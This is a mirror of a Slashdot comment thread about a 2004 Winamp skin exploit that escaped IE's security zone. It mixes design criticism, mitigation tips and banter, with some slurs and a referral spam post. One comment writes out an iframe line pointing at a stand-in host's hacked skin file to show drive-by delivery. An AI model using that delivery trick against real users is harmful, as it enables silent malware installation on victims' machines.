Slashdot Mirror
Winamp Skin Exploit in the Wild
An anonymous reader writes "Secunia.com has announced an exploit (derived from xml escaping the Internet zone into IE's local zone) that exploits Winamp's habit of automatically installing skins. Currently all versions of Winamp are affected. Details on the Winamp forums - apparently an exploit is already in the wild, and spreading."
to compromise a system..
Luckily the masses of windows users are content to use windows media player which should slow the spread of this.
?SYNTAX ERROR IN LINE 42
I knew that your oh-so-sexy winamp skin would be my downfall.
One of the winamp betas had the option to use the mozilla engine rather than the IE one. Shame they never spent more time on this feature then they could easily tell people they could fix this exploit by turning off the MS Engine.
I propose "flensing."
Seems to me I was just bitching about skinning and mentioned that security holes were one possible (but unlikely) down-side. I love when the universe makes my point for me.
who unchecks every option in any program I install that begins with "Automatically [check for/download] and install ..."?
I browse Slashdot at +3, Funny
Don't get your skins from anyone but WinAMP.
OR
Don't use skins at all.
-jls
Techno-pagan
Just as long as the exploit isn't used to install SP2 were all safe.
The Securia.com link in the profile says that only Winamp 3.x and 5.x. But doesn't mention 2.x... the vast majority of Winamp users I know don't use 3.x or 5.x due to the massive feature bloat.
Is 2.x actually susceptible or is the submitter incorrect?
sig.
"I can not bring myself to believe that if knowledge presents danger, the solution is ignorance" - Isaac Asimov
am i the only person that finds ever changing interfaces an annoyance??
love is just extroverted narcissism
Program skins with "browser tags" and "embedded xml"? sheesh, what next, word processor documents that have executable code inside?
"A door is what a dog is perpetually on the wrong side of" - Ogden Nash
.
Winamp Unlimited has a friendly summary on how the worm infects the user, as well as steps one can take to avoid being infected.
This is also worth noting: "The Nullsoft team have already implemented a patch for this exploit, which will be included in a very-near future release5.04a or 5.05. This next version is already in its third beta stage, and will include several other unrelated changes/fixes."
Of course, then you can't listen to Internet radio...
Editor Emeritus and Senior Writer, TeleRead.org
http://secunia.com/advisories/11622/ Yes it has, wannabe nerd. Don't talk the crap unless you can back it up.
Listen to my experimental-industrial-techno!
Damn dude, I was going to step up and prosleritize 'NIX/XMMS, but you beat me to it:) By the same token you could support good ol' Winamp 2, which is basically the same thing. Ooo, winamp 5; look at all the useless, animated, colorful features!
I mean, WinAmp can actually look like different kinds of real CD players! Can you believe that? It can look like all sorts of things; it doesn't have to look like a rectangular window at all. That just rocks! You can even change the way it looks at runtime! You can download whole new looks! Man, that is too cool.
Kudos to those guys. This is the kind of thing that really makes computing fun.
Just to comment on all the first 11 posts I see here:
..
(1) I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then it's disabling can also be circumvented?
(2) Absolutely right, having a component of the system that is active to ALL programs, wether it wants it or not, is inviting the most bizarre of security holes. Of course, the WinAmp people probably should come up with a better, more secure transport method for getting their skins around, but it's not really their fault that IE is a pile of crap security wise.
(3) what kinda genius would figure out that you could embed an xml file, with instructions to run a specific executeable file, within a zipped skin file, and then manage to trigger a security hole in a web-browser module that really shouldn't have a damn thing to do involved with the program that you're sending this virus through? The people who are BREAKING the security I figure have got to be infinitely more intelligent than the people who are CREATING the security.. or at least a whole hell of a lot more creative..
i really can't imagine that anyone could be thinking, when they write a program like this, "oh, what if someone tries to take advantage of such and such known security flaw in this way through our program, even though they don't have jack and shit to do with each other?"
obviously, you're going to try to cover in advance for security things, but who could predict in attack in such a convoluted fashion?
"Champagne for my real friends - and real pain for my sham friends!" http://ericblade.postalboard.com/
Is there any way to actually uninstall IE or atleast make it absolutely not the default browser and ban its exicution or engine use by all other programs and perhaps replace that engine with something else? Considering that was part of a big law-suit surly theres a way? Infact i need IE installed for website testing so the second option would be best.. all i can think of is setting the permissions of the engine dll and IE exicutables but replacing it would be nice too..
This comment does not represent the views or opinions of the user.
see? more of a fix than you'd first assume :)
Now that people have started to use firewalls, and the risk of worms and rootkits that infect through open, exploitable, holes grows smaller, it is time to expect more and more exploits to follow alternative vectors.
Note how many buffer-overflow exploits there have been in server daemons. Well, there is no reason to believe that servers are any worse written with regards to input than client applications - quite the contrary actually.
People think they are safe with a firewall. But I'm willing to bet there are undiscovered exploits in just about every application they run. WinZip? WinAMP? Acrobat Reader? Media player? Anything that handles files received over the Internet is potentially a vector for viruses and possibly worms.
This time it was bad escaping, which made the exploit trivial, but there a buffer overflow would have served just as well. Neither firewalls nor anti-virus software will protect you.
I'm an idiot--I don't get it. Can anybody help?
Flensing means to remove the skin from something.
Sailing over the event horizon
For what possible purpose does a skin -- which is essentially nothing more than graphical elements -- need to invoke the browser?
WTF? Seriously, help me out here. I've only been a programmer for 25 years, so I may not understand the deeply compelling reasons driving such a design decision.
Schwab
Editor, A1-AAA AmeriCaptions
I notice the average vocabularical IQ drops about 50 points once 3pm EST hits.
vocabularical.
I believe you were saying something?
I'm pretty sure the llama is tired of getting its ass whipped.
ANY library that works like the Microsoft HTML control (this is what Microsoft calls all the non-trivial bits of Internet Explorer... the IE application is just a thin wrapper around this) is at risk for exploitation. The only way to be sure that nobody's going to break out of your sandbox is to make sure that the application that creates the sandbox is the application that controls access from the sandbox, and that any helper applications it calls unconditionally implement their own sandboxes.
If you use the *same* application, API, or application binding (eg, the file type bindings used by the desktop and the MS HTML control, or Apple's LaunchServices) for both sandboxed and trusted objects, then you open up the possibility that an untrusted object will look like a trusted object, or that an untrusted object will be passed to a handler that isn't inherently safe.
Apple blew this with launchServices, and they still haven't really fixed the underlying problem. But they've only been in denial a few months, whereas Microsoft has been in denial about this for seven years, so let's look at Microsoft...
Let's suppose the HTML control was split up, so it only did rendering. Whenever it wanted to open a file, open a URL, run a script, load a plug-in, it would ask the parent application "what do I do about a CHM file" or "what do I do about <script language=vbscript>". You'd have an "HTML-only control" and a "Web Access control" and IE would be a very slightly thicker wrapper around both.
So then you register "Word Viewer"[1] with Outlook and IE as the helper application for Word documents, and "Word" with Windows Explorer as the helper application for trusted Word documents. If this was done, then Outlook (which would be a sandboxing application in this model) would open "Word Viewer" for untrusted documents.
Viola, no more email-spread Word macro viruses.
Similarly, Outlook would decline to run VBscript, and IE would decline to run the Windows Update plugin... you'd have a Windows Update program that was a thin shell around the HTML-only control... one that only opened windows update.
Microsoft could have their cake and eat it too, and EVERYONE would have a more secure and less spammy environment.
You are aware iTunes installs massive (many MB) services that start at bootup you have no need of don't you? You're aware it blindly installs the iPod service, whether you have an iPod or not right? If I remember the last time I looked at it ALSO installed Quicktime, which is one of the worst behaved Windows installs of a media utility in well, pretty much ever. And Quicktime btw, also installs services you have absolutely no need of.
Memory is cheap, but that doesn't mean I want Apple deciding it can just use mine for code that never executes (or even worse, executes when I don't need it).
I'd bet it's probably not an issue for xmms using winamp skins. I don't believe it's a problem with winamp per se. I believe it's due to winamp's integration with IE.
It really annoying that IE integration can't be disabled or if it's even possible to integrate with another browser.
I don't know exactly how it works, but certain streams will pop open the Winamp browser window to the stream's home page and the stream's home page has popups.
In fact, due to integration with IE, even if you don't use IE for any browsing, someone could set up an enticing stream (**cough**pr0n**cough) and infect a lot of people with malware who think they're safe because they never websurf with IE.
Who the fuck uses the crappy bloated recourse hog that is 5.x anyway.... ah Internet Explorer users.
5.x playing in the background using 0% CPU and under 6mb of RAM... about what 2.x uses... with a feature-set comparable to iTunes without the huge iTunes resource overhead, 3 installed services, etc, etc. A "lightweight" media player like foobar2000 is ~1% CPU and 11mb RAM.
Portable versions of Firefox, GIMP, LibreOffice, etc
Wrong. All you need to do is open a wsz file in order to get exploited-- subsequent network access isn't required. And internet explorer is happy to auto-open that wsz file for you.
"so I may not understand the deeply compelling reasons driving such a design decision."
*raises hand*
Because since the late 90s EVERY PROGRAM must use the internet in some way. Useful or not. Anyone else notice this trend?
Go here for teh [sic] funny.
Of course, they had to put in "themes", but at least it doesn't download them itself.
"Good ole microsoft has this thing called media player that plays my mp3's..."
"Cant trust those evil 3rd party hacker programs... Thats what they say they wouldnt lie.. See this just proves it.."
Not that Microsoft would be *that* evil to release exploits for 3rd party apps.... but its an idea..
---- Booth was a patriot ----
Still trying to figure out - is it winamp's fault that an XML character escape sequence causes stupid IE to run as in a local zone.
:-)
:-(]
This isn't the first app that gets nailed just because it was using IE (for whatever extent of use - full rendering or peripheral stuff like SSL Certificate handling or XML processing).
Just add this to the IE screwups tally
get a free iPod![This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier
I've never been linked to (well, indirectly) on slashdot before - it's my 30 seconds of fame!
Just to add to the original thread a little, I only saw the worm spreading on IRC and I only saw 2 people who were spamming the link - like all mirc worms the infected person doesn't know they are doing it until someone tells them.
I guess it's not got very far - since I reported the exploit i've not seen another spammed link for it.
And Winamp is a multimedia player for Windows systems (with the exception of a horribly crappy alpha version of the now-dead 3.0 release of Winamp that was made available on Linux, but that hardly counts does it?). If I'm a Winamp user, I'm using Windows, and so XMMS is not an option. Why would I change my entire operating system simply to get a media player that started life as a duplicate of the one I already have on Windows (and XMMS still is little more than a Winamp-wannabe)?
Not only does evil P2P software break the law, it helps infect your computer! A program called Winamp, used by illegal copyright infringers to play their music files called MP3s, has a security hole allowing evil hackers to enter your system! We need to band together to ban this evil and dangerous Winamp program. Remember, no matter what, it is WRONG to use Winamp to play downloaded MP3s--and now, it is dangerous. Respect copyrights; uninstall Winamp.
In related news, our editors today learned of the calc_virus; remote explotation of Windows Calculator utility is possible and attackers can gain access to your machine via this program. The announcment that MS recommends you use an abacus was heralded as a remarkable advance in system security
Need Mercedes parts ?
...pointless skins for media players can go to hell. Foobar 2000 forever!
Foobar does
http://www.foobar2000.org/
Handy, simple, small, and will go straight to the system tray.
-Doug
The last time I tried it, WinAmp wouldn't work for me unless I had administrator privileges--so this exploit can do maximal damage. Maybe this will move a rewrite to work reasonably in a multi-user environment up on their priority list? (We can hope...)
Good thing you never looked back. We're all pointing and laughing at you.
Seriously man... posting this comment in a thread detailing an exploit in your elitist program is kinda... retarded.
WinAmp exploits: 2 (that I know of)
iTunes exploits: 0
Let's keep score.
Ironically, the word ironically is often used incorrectly.
Why are you geeks worried? Shouldn't you be using Foobar2000 anyway? It is about 2000 X better than winamp and packed with geek friendly features.
Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
...it's another WINDOWS problem. The OS and any apps for it are "run at your own peril". That includes mozilla stuff. It's because it's designed to run on WINDOWS.
WINDOWS
WINDOWS
WINDOWS
I don't care how leet folks think they are, as long as people run windows stuff, develop for windows, run windows apps, think about windows, they are gonna get hosed, sooner or later.
You would think after 10 years of this stuff that it would be noticed, nope, folks still think just one more patch or one more version higher of their windows apps or OS is gonna magically fix windows.
Charlie Brown
Lucy
Lucy holding football
Charlie Brown on his butt looking lame
Charlie Brown = windows
Lucy = windows apps
Lucy holding football = thinking just this one more time, that this is the time she will hold it correctly, that just this time it will work and be "secure"
Charlie Brown on his butt for the 9,863rd time = windows users, never learn, always going to think if they hold out one more time it will be OK.
It's how it is delivered. The simpilest way involves:
iframe src="http://www.blah.com/winamphackedskin.wsz"
That right there, in any browser, will initiate a download of the winamp skin file. In Opera/Firefox/Mozilla you are given a download confirmation prompt. However, if IE is your default browser then IE will auto download and install the winamp skin without your knowledge.. or at least until your winamp pops up suddenly with a new skin. We can't tell people to "don't download skins" merely because it's far more serious than that. Manual skin changing or not, that iframe trick is going to nail a lot of people.
The best bet would be to ignore winamp completely until a patch can be provided, or have Firefox set as your default browser.
"We're breaking out the ramen noodles. . . "
"Really? Is it someone's birthday?"
When did this become a common problem? When I used to program way back in the late 80's software code was simple and clean. We didn't really have issues like this to worry about. The occasional virus, but those were actually .com or .exe programs. I know the Internet wasn't in place for the public yet, but still. And I know about the Unix worm. But isn't the main reason this is happening because coding gotten either that sloppy or that disorganized?
As much as I hate Microsoft, I don't blame them for things like this although they have not set a good example. There are thousands of programmers to blame for sloppy code, bloat and security issues so we can spread it around a bit.
Have you hugged your penguin today?
Yes, let us keep score.
Winamp gayness: 0
iTunes gayness: 1,000,000,000,OMG,LOL,000
Use Work Offline mode in IE when you aren't using it. This setting will be saved even when you close IE thus keeping IE exploits such as this down. As a side note, it also kills the ads in AIM which is a nice plus. The only downside is when a program does try to access the internet using IE (such as AIM) it prompts you to Stay Offline or Connect. All you have to do is click stay offline and you'll be fine. If anyone knows how to suppress this prompt I would love to hear it.
I realize you're trolling, but I'm bored...
Yes, Apple DOES decide for you that you need a web browser in every application on the operating system. Is it insecure? Well, not that we know of right now, because Apple patches the holes when they're found, just like Microsoft does (but yes, Apple's browser does have fewer security holes than Microsoft's).
Safari is 13MB, 10.1MB of which is localized text (for menus, dialog boxes, etc.) for languages other than English. It would be less than 3MB if you stripped that out (and you can get a program to do that for you, system-wide, if you want). Why? Because it doesn't include the HTML rendering engine.
The fact that OS X has not yet had one critical exploit speaks for itself. (And yes, OS 7-8 *did* have quite a few exploits and viruses.)
Wrong again. According to Steve Jobs:
By the way, if you're interested in the HTML rendering engine that Apple includes in Mac OS X and makes available to all applications (just like Microsoft does), the source code is here (it's LGPL). OK, so that's not like Microsoft.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
--Rick "If it isn't broken, take it apart and find out why."